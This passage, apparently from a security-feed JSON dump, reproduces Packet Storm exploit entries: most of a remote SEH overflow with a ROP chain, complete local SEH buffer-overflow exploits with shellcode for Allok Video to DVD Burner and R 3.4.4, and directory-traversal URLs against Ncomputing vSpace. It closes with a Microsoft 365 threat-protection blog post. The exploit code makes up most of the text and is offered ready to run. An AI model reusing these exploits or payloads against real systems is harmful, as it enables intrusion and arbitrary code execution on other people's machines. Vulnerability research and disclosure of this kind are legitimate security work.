\"\\x32\\x50\\x56\\x73\\x58\\x6c\\x66\\x6c\\x55\\x4d\\x6d\\x6d\" \nshellcode += \"\\x4d\\x49\\x6f\\x49\\x45\\x65\\x6c\\x45\\x56\\x73\\x4c\\x45\" \nshellcode += \"\\x5a\\x6b\\x30\\x6b\\x4b\\x39\\x70\\x53\\x45\\x34\\x45\\x4d\" \nshellcode += \"\\x6b\\x42\\x67\\x65\\x43\\x63\\x42\\x70\\x6f\\x50\\x6a\\x37\" \nshellcode += \"\\x70\\x66\\x33\\x6b\\x4f\\x69\\x45\\x30\\x63\\x35\\x31\\x72\" \nshellcode += \"\\x4c\\x65\\x33\\x76\\x4e\\x75\\x35\\x42\\x58\\x45\\x35\\x67\" \nshellcode += \"\\x70\\x41\\x41\" \n \n# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler] \nbuffer = '\\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget) \n \n# mona.py VirtualProtect() ROP template with few modifications \n \n# ESI = ptr to VirtualProtect() \nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll] \nbuffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] \n \n# EBP = ReturnTo (ptr to jmp esp) \nbuffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll] \n \n# EDX = NewProtect (0x40) \nbuffer += struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \nbuffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll] \n \n# ECX = lpOldProtect (ptr to W address) \nbuffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll] \n \n# EBX = dwSize (0x00000501) \nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate \nbuffer += struct.pack('<L', 0x100231d1) # NEG EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll] \n \n# EDI = ROP NOP (RETN) \nbuffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll] \n \n# EAX = NOP (0x90909090) \nbuffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll] \nbuffer += struct.pack('<L', 0x90909090) # nop \nbuffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll] \n \nbuffer += \"\\x90\" * 50 # nop \nbuffer += shellcode # calc.exe \nbuffer += \"\\x90\" * 50 # nop \n \nbuffer += '\\x45' * (1412-(4*88)+128-len(shellcode)-100) \nbuffer += '\\x42' * 4 # nSEH filler \n \n# stack pivot that will land somewhere in buffer of As \nbuffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll] \n \nbuffer += '\\x44' * (5000-4059-4-4) \n \nprint \"[+] Sending %s bytes of evil payload..\" %len(buffer) \ntime.sleep(1) \n \ntry: \ncookies = dict(SESSIONID='6771', UserID=buffer,PassWD='') \ndata=dict(frmLogin='',frmUserName='',frmUserPass='',login='') \nrequests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data) \nexcept: \nprint \"The server stopped responding. You should see calc.exe by now ;D\" \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147336/efsws72userid-overflow.txt"}, {"lastseen": "2018-04-25T09:09:03", "references": [], "description": "", "edition": 1, "reporter": "T3jv1l", "published": "2018-04-24T00:00:00", "title": "Allok Video To DVD Burner 2.6.1217 Buffer Overflow", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-04-24T00:00:00", "id": "PACKETSTORM:147339", "href": "https://packetstormsecurity.com/files/147339/Allok-Video-To-DVD-Burner-2.6.1217-Buffer-Overflow.html", "sourceData": "`####################################################### \n# Exploit Title: Buffer Overflow(SEH) on Allok Video to DVD Burner2.6.1217 \n# Date: 23.04.2018 \n# Exploit Author:T3jv1l \n# Vendor Homepage:http://www.alloksoft.com/ \n# Software: www.alloksoft.com/allok_dvdburner.exe \n# Category:Local \n# Contact:https://twitter.com/T3jv1l \n# Version: Allok Video to DVD Burner 2.6.1217 \n# Tested on: Windows 7 SP1 x86 \n# Hello subinacls ! \n# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/ \n############################################################# \n \nprint\"\"\" \n#1. Download and install the setup file \n#2. Run this exploit code via python 2.7 \n#3. A file \"Evil.txt\" will be created \n#4. Copy the contents of the file (Evil.txt)and paste in the License Name field \n#5. Click Register and BOMM !!!! \"\"\" \n \nimport struct \n \nfile = open(\"Evil.txt\",\"wb\") \nbuffer = 4000 \njunk = \"A\" * 780 \nnseh = \"\\x90\\x90\\xeb\\x10\" \nseh = struct.pack(\"<L\",0x10019A09) \nnop = \"\\x90\" * 20 \n \n# Shellcode Calc.exe \n \nbuf = \"\" \nbuf +=\"\\xba\\xd5\\x31\\x08\\x38\\xdb\\xcb\\xd9\\x74\\x24\\xf4\\x5b\\x29\\xc9\\xb1\" \nbuf +=\"\\x33\\x83\\xc3\\x04\\x31\\x53\\x0e\\x03\\x86\\x3f\\xea\\xcd\\xd4\\xa8\\x63\" \nbuf +=\"\\x2d\\x24\\x29\\x14\\xa7\\xc1\\x18\\x06\\xd3\\x82\\x09\\x96\\x97\\xc6\\xa1\" \nbuf +=\"\\x5d\\xf5\\xf2\\x32\\x13\\xd2\\xf5\\xf3\\x9e\\x04\\x38\\x03\\x2f\\x89\\x96\" \nbuf +=\"\\xc7\\x31\\x75\\xe4\\x1b\\x92\\x44\\x27\\x6e\\xd3\\x81\\x55\\x81\\x81\\x5a\" \nbuf +=\"\\x12\\x30\\x36\\xee\\x66\\x89\\x37\\x20\\xed\\xb1\\x4f\\x45\\x31\\x45\\xfa\" \nbuf +=\"\\x44\\x61\\xf6\\x71\\x0e\\x99\\x7c\\xdd\\xaf\\x98\\x51\\x3d\\x93\\xd3\\xde\" \nbuf +=\"\\xf6\\x67\\xe2\\x36\\xc7\\x88\\xd5\\x76\\x84\\xb6\\xda\\x7a\\xd4\\xff\\xdc\" \nbuf +=\"\\x64\\xa3\\x0b\\x1f\\x18\\xb4\\xcf\\x62\\xc6\\x31\\xd2\\xc4\\x8d\\xe2\\x36\" \nbuf +=\"\\xf5\\x42\\x74\\xbc\\xf9\\x2f\\xf2\\x9a\\x1d\\xb1\\xd7\\x90\\x19\\x3a\\xd6\" \nbuf +=\"\\x76\\xa8\\x78\\xfd\\x52\\xf1\\xdb\\x9c\\xc3\\x5f\\x8d\\xa1\\x14\\x07\\x72\" \nbuf +=\"\\x04\\x5e\\xa5\\x67\\x3e\\x3d\\xa3\\x76\\xb2\\x3b\\x8a\\x79\\xcc\\x43\\xbc\" \nbuf +=\"\\x11\\xfd\\xc8\\x53\\x65\\x02\\x1b\\x10\\x99\\x48\\x06\\x30\\x32\\x15\\xd2\" \nbuf +=\"\\x01\\x5f\\xa6\\x08\\x45\\x66\\x25\\xb9\\x35\\x9d\\x35\\xc8\\x30\\xd9\\xf1\" \nbuf +=\"\\x20\\x48\\x72\\x94\\x46\\xff\\x73\\xbd\\x24\\x9e\\xe7\\x5d\\x85\\x05\\x80\" \nbuf +=\"\\xc4\\xd9\" \nexploit = junk + nseh + seh + nop + buf \nfillers = buffer - len(exploit) \ncrush = exploit + \"T\" * fillers \nprint \"[+] Crush Me\" \nfile.write(crush) \nfile.close() \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147339/allokvideodvdburner26-overflow.txt"}, {"lastseen": "2018-04-25T09:09:03", "references": [], "description": "", "edition": 1, "reporter": "bzyo", "published": "2018-04-24T00:00:00", "title": "R 3.4.4 Local Buffer Overflow", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9060"], "modified": "2018-04-24T00:00:00", "id": "PACKETSTORM:147338", "href": "https://packetstormsecurity.com/files/147338/R-3.4.4-Local-Buffer-Overflow.html", "sourceData": "`#!/usr/bin/python \n \n# \n# Exploit Author: bzyo \n# CVE: CVE-2018-9060 \n# Twitter: @bzyo_ \n# Exploit Title: R 3.4.4 - Local Buffer Overflow \n# Date: 03-27-2018 \n# Vulnerable Software: R 3.4.4 \n# Vendor Homepage: https://www.r-project.org/ \n# Version: 3.4.4 \n# Software Link: https://cloud.r-project.org/bin/windows/ \n# Tested On: Windows 7 x86 \n# \n# Timeline: \n# 03-27-18: Emailed author, no response \n# 04-03-18: Emailed author, no response \n# 04-10-18: Emailed author, no response \n# 04-23-18: New version released; Submitted public disclosure \n# \n# lots of bad chars, use alpha_mixed \n# badchars \\x00\\x0a\\x0d\\x0e and \\x80 through \\xbf \n# \n# \n# PoC: \n# 1. generate r344.txt, copy contents to clipboard \n# 2. open app, select Edit, select 'GUI preferences' \n# 3. paste r344.txt contents into 'Language for menus and messages' \n# 4. select OK \n# 5. pop calc \n# \n \n \nfilename=\"r344.txt\" \n \njunk = \"A\"*900 \n \n#jump 6 \nnseh = \"\\xeb\\x06\\xcc\\xcc\" \n \n#0x643c17af : pop esi # pop edi # ret | {PAGE_EXECUTE_READ} [Riconv.dll] \nseh = \"\\xaf\\x17\\x3c\\x64\" \n \n#msfvenom -a x86 -p windows/exec CMD=calc.exe -b \"\\x00\\x0a\\x0d\\x0e\" -e x86/alpha_mixed -f c \n#Payload size: 448 bytes \ncalc = (\"\\x89\\xe1\\xd9\\xf7\\xd9\\x71\\xf4\\x5b\\x53\\x59\\x49\\x49\\x49\\x49\\x49\" \n\"\\x49\\x49\\x49\\x49\\x49\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x51\\x5a\\x6a\" \n\"\\x41\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\" \n\"\\x42\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\" \n\"\\x59\\x6c\\x5a\\x48\\x4c\\x42\\x77\\x70\\x53\\x30\\x45\\x50\\x35\\x30\\x6b\" \n\"\\x39\\x58\\x65\\x70\\x31\\x39\\x50\\x30\\x64\\x4c\\x4b\\x50\\x50\\x64\\x70\" \n\"\\x6e\\x6b\\x71\\x42\\x34\\x4c\\x4e\\x6b\\x71\\x42\\x37\\x64\\x6e\\x6b\\x62\" \n\"\\x52\\x56\\x48\\x36\\x6f\\x4c\\x77\\x61\\x5a\\x64\\x66\\x56\\x51\\x49\\x6f\" \n\"\\x6e\\x4c\\x45\\x6c\\x75\\x31\\x71\\x6c\\x53\\x32\\x66\\x4c\\x55\\x70\\x69\" \n\"\\x51\\x38\\x4f\\x44\\x4d\\x47\\x71\\x6a\\x67\\x78\\x62\\x6a\\x52\\x31\\x42\" \n\"\\x76\\x37\\x4e\\x6b\\x70\\x52\\x44\\x50\\x6e\\x6b\\x61\\x5a\\x47\\x4c\\x6c\" \n\"\\x4b\\x30\\x4c\\x34\\x51\\x71\\x68\\x4b\\x53\\x63\\x78\\x77\\x71\\x4b\\x61\" \n\"\\x63\\x61\\x4e\\x6b\\x63\\x69\\x35\\x70\\x56\\x61\\x4e\\x33\\x6e\\x6b\\x57\" \n\"\\x39\\x65\\x48\\x68\\x63\\x44\\x7a\\x37\\x39\\x6c\\x4b\\x46\\x54\\x6c\\x4b\" \n\"\\x47\\x71\\x7a\\x76\\x35\\x61\\x49\\x6f\\x4c\\x6c\\x7a\\x61\\x6a\\x6f\\x64\" \n\"\\x4d\\x55\\x51\\x4b\\x77\\x57\\x48\\x6b\\x50\\x74\\x35\\x69\\x66\\x65\\x53\" \n\"\\x31\\x6d\\x4a\\x58\\x77\\x4b\\x61\\x6d\\x51\\x34\\x61\\x65\\x6a\\x44\\x61\" \n\"\\x48\\x4e\\x6b\\x62\\x78\\x45\\x74\\x47\\x71\\x79\\x43\\x71\\x76\\x4c\\x4b\" \n\"\\x64\\x4c\\x72\\x6b\\x6c\\x4b\\x73\\x68\\x35\\x4c\\x43\\x31\\x6a\\x73\\x6e\" \n\"\\x6b\\x37\\x74\\x6e\\x6b\\x37\\x71\\x4e\\x30\\x4f\\x79\\x52\\x64\\x35\\x74\" \n\"\\x55\\x74\\x71\\x4b\\x51\\x4b\\x51\\x71\\x70\\x59\\x72\\x7a\\x53\\x61\\x6b\" \n\"\\x4f\\x59\\x70\\x73\\x6f\\x63\\x6f\\x72\\x7a\\x4c\\x4b\\x56\\x72\\x48\\x6b\" \n\"\\x6e\\x6d\\x31\\x4d\\x50\\x6a\\x55\\x51\\x6e\\x6d\\x4b\\x35\\x4f\\x42\\x73\" \n\"\\x30\\x65\\x50\\x55\\x50\\x42\\x70\\x72\\x48\\x70\\x31\\x4e\\x6b\\x42\\x4f\" \n\"\\x6c\\x47\\x6b\\x4f\\x4a\\x75\\x4d\\x6b\\x5a\\x50\\x48\\x35\\x6e\\x42\\x31\" \n\"\\x46\\x62\\x48\\x39\\x36\\x5a\\x35\\x6f\\x4d\\x6d\\x4d\\x4b\\x4f\\x79\\x45\" \n\"\\x45\\x6c\\x63\\x36\\x73\\x4c\\x45\\x5a\\x6b\\x30\\x59\\x6b\\x79\\x70\\x50\" \n\"\\x75\\x55\\x55\\x6d\\x6b\\x43\\x77\\x42\\x33\\x61\\x62\\x62\\x4f\\x33\\x5a\" \n\"\\x33\\x30\\x56\\x33\\x49\\x6f\\x49\\x45\\x43\\x53\\x53\\x51\\x72\\x4c\\x53\" \n\"\\x53\\x44\\x6e\\x65\\x35\\x64\\x38\\x43\\x55\\x67\\x70\\x41\\x41\") \n \nfill = \"D\"*8000 \n \nbuffer = junk + nseh + seh + calc + fill \n \ntextfile = open(filename , 'w') \ntextfile.write(buffer) \ntextfile.close() \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147338/r344-overflow.txt"}, {"lastseen": "2018-04-24T09:30:29", "references": [], "description": "", "edition": 1, "reporter": "Javier Bernardo", "published": "2018-04-23T00:00:00", "title": "Ncomputing vSPace Pro 10 / 11 Directory Traversal", "type": "packetstorm", "enchantments": {}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10201"], "modified": "2018-04-23T00:00:00", "id": "PACKETSTORM:147303", "href": "https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html", "sourceData": "`# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability \n# Date: 2018-04-20 \n# Software Vendor: NComputing \n# Software Link: \n# Author: Javier Bernardo \n# CVE: CVE-2018-10201 \n# Category: Webapps \n \n#[Description] \n# \n#It is possible to read arbitrary files outside the root directory of \n#the web server. This vulnerability could be exploited remotely by a \n#crafted URL without credentials, with a|/ or a|\\ or a|./ or a|.\\ as a \n#directory-traversal pattern to TCP port 8667. \n# \n#An attacker can make use of this vulnerability to step out of the root \n#directory and access other parts of the file system. This might give \n#the attacker the ability to view restricted files, which could provide \n#the attacker with more information required to further compromise the system. \n \n#[PoC] \n \nnmap -p T:8667 -Pn your_vSpace_server \n \nNmap scan report for your_vSpace_server (x.x.x.x) \nHost is up (0.044s latency). \n \nPORT STATE SERVICE \n8667/tcp open unknown \n \nhttp://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini \n \nhttp://your_vSpace_server:8667/...\\...\\...\\...\\...\\...\\...\\...\\...\\windows\\win.ini \n \nhttp://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini \n \nhttp://your_vSpace_server:8667/....\\....\\....\\....\\....\\....\\....\\....\\....\\windows\\win.ini \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147303/ncomputingvspace-traversal.txt"}], "mssecure": [{"lastseen": "2018-04-24T22:29:29", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "_This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security._\n\n## The roots of Microsoft 365 threat protection\n\nOver the next few weeks, well introduce you to Microsoft 365s threat protection services and demonstrate how Microsoft 365s threat protection leverages strength of signal, integration, machine learning and AI to help secure the modern workplace from a ransomware attack. [Previously](<https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/how-office-365-protects-your-organization-from-modern-phishing-campaigns/>), we showcased how Office 365 helps mitigate modern phishing attacks. Microsoft 365 threat protection goes even further, providing robust protection, detection, and response capabilities across an organizations entire attack surface. For those not aware, Microsoft 365 was [introduced](<https://www.youtube.com/watch?v=Ln_eJtuBMJ8>) at last years [Microsoft Inspire conference](<https://partner.microsoft.com/en-US/inspire/>), to provide an intelligent, integrated, and secure solution for the [modern workplace](<https://www.youtube.com/watch?v=Ln_eJtuBMJ8>), combining the benefits of Microsofts flagship Windows, Office 365, and Enterprise Mobility Suite (EMS) platforms. Figure 1 shows the services which are part of Microsoft 365 threat protection and jointly help secure the modern workplace so organizations can initiate and drive their digital transformation.\n\n\n\n_Figure 1. The Microsoft 365 threat protection security services_\n\n## Microsoft is committed to a security first mindset\n\nMicrosoft has always been securing products and platforms to protect our customers who rely on our software and cloud services. Our security focus is essential to meet the 24/7 business cycle demands and helps ensure our customers rarely experience downtime from a security event. Microsoft invests $1B+ annually on security, employs [3500+ security professionals](<https://blogs.microsoft.com/on-the-issues/2017/05/14/need-urgent-collective-action-keep-people-safe-online-lessons-last-weeks-cyberattack/>), and has built several strong ecosystem partnerships. As the modern workplace grows in complexity, Microsoft continues building and enhancing its security capabilities to help our customers stay ahead of modern threats. Microsoft itself is one of the worlds largest enterprises and uses the same security products to protect our organization that we offer our customers.\n\n## The Microsoft Intelligent Security Graph\n\nFor our teams at Microsoft (both in operations and development), security really begins with the [Microsoft Intelligent Security Graph](<http://www.microsoft.com/intelligence>). It is the platform that powers Microsoft security products and services by using advanced analytics to link threat intelligence and security signals from Microsoft and partners to identify and mitigate cyberthreats. Intelligence in the Intelligent Security Graph comes from consumer and commercial services that Microsoft operates on a global scale, such as Windows, Office 365, and Azure as shown in figure 2. At Microsoft, we have massive depth and breadth of intelligence. Across our global services, each month we scan 400 billion email messages for phishing and malware, process 450 billion authentications, execute more than 18 billion web page scans, and scan more than 1.2 billion devices for threats, nearly 2.6 billion monthly unique file scans, and more than 200 cloud services. Importantly, this data always goes through strict privacy and compliance boundaries before being used for security.\n\n\n\n_Figure 2. Microsofts Global Threat Intelligence is one of the largest in industry_\n\nSignal from the graph is analyzed using a combination of Microsofts industry leading artificial intelligence and machine learning capabilities coupled with the expertise of security researchers, analysts, hunters, and engineers across the company to quickly identify attacks and emerging trends so that we can evolve the immediate detections and capabilities of Microsoft 365. All our security capabilities leverage the graph, including the threat protection services comprised of Windows Defender Advanced Threat Protection (WDATP), Office 365 Advanced Threat protection (ATP), Office 365 Threat Intelligence, Microsoft Cloud App Security, Azure Security Center, and the newly launched Azure Advanced Threat Protection (Azure ATP).\n\nThese threat protection services also share threat signal with each other through the graph and this signal sharing enables each service to leverage threat data from not only the threats blocked by that service but also threat in the entire threat landscape. While this post uses the example of a sophisticated ransomware attack, customers who leverage the entire Microsoft 365 threat protection stack will have near real-time protection from many types of new and unknown threats (e.g. 0-days, advanced phishing, advanced malware, etc) for their device ecosystem, Office 365 ecosystem, and cloud, on-premises, or hybrid infrastructures by leveraging the Intelligent Security Graph.\n\n## Microsoft 365 threat protection\n\nThe modern workplace is exposed to the rapid evolution of cyber threats, from individual threats, to [sophisticated organizational breaches](<https://www.youtube.com/watch?v=Ln_eJtuBMJ8>), to [rapid cyberattacks](<https://cloudblogs.microsoft.com/microsoftsecure/2018/01/23/overview-of-rapid-cyberattacks/>). With the growing complexity of the modern workplace, the attack surface has rapidly expanded, to a point where no single service can adequately protect an organization. To address this, we focused on developing different services that specialize on the main threat vectors and then integrating them together via the Intelligent Security Graph. The modern workplace is composed of employee identities, enterprise applications and data, devices, and infrastructure. Microsoft 365 threat protection helps mitigate advanced threats from each of these potential threat vectors providing an end to end, holistic solution securing an organizations entire attack surface enabling:\n\n * **Protection** against advanced threats such as 0-days, targeted phishing, ransomware, and others\n * **Detection** when a breach has occurred, who has been breached, what data has been compromised\n * **Response** remediate from an attack and return the organization to a no threat state\n * **Education** end users on how to react or respond to different types of threats\n\nWhile most security solutions do not include an educational component, we have seen that many of our customers now help educate their end users on how to react and behave in the event of a cyberattack. To help address this important aspect of security, we now offer tools that can help educate end users. While the majority of attacks are still initiated via email, 2017s most destructive attacks, NotPetya and WannaCry, were not email based. One of the benefits of Microsoft 365 threat protection is seamless integration that enables rapid transfer of information across platforms and services to help ensure all attack surfaces are quickly secured no matter where a threat originates. Over the next few weeks, we will cover Microsoft 365 and how to enable (1) Protection (2) Detection (3) Response and Education. Next week, well demonstrate how Microsoft 365 threat protection helps organizations protect themselves from a ransomware attack.", "reporter": "Microsoft Secure Blog Staff", "published": "2018-04-24T16:00:23", "type": "mssecure", "title": "Securing the modern workplace with Microsoft 365 threat protection \u2013 part 1", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-24T16:00:23", "id": "MSSECURE:5616DCEDB71881288A5529796CF9C8BA", "href": "https://cloudblogs.microsoft.com/microsoftsecure/2018/04/24/securing-the-modern-workplace-with-microsoft-365-threat-protection-part-1/", 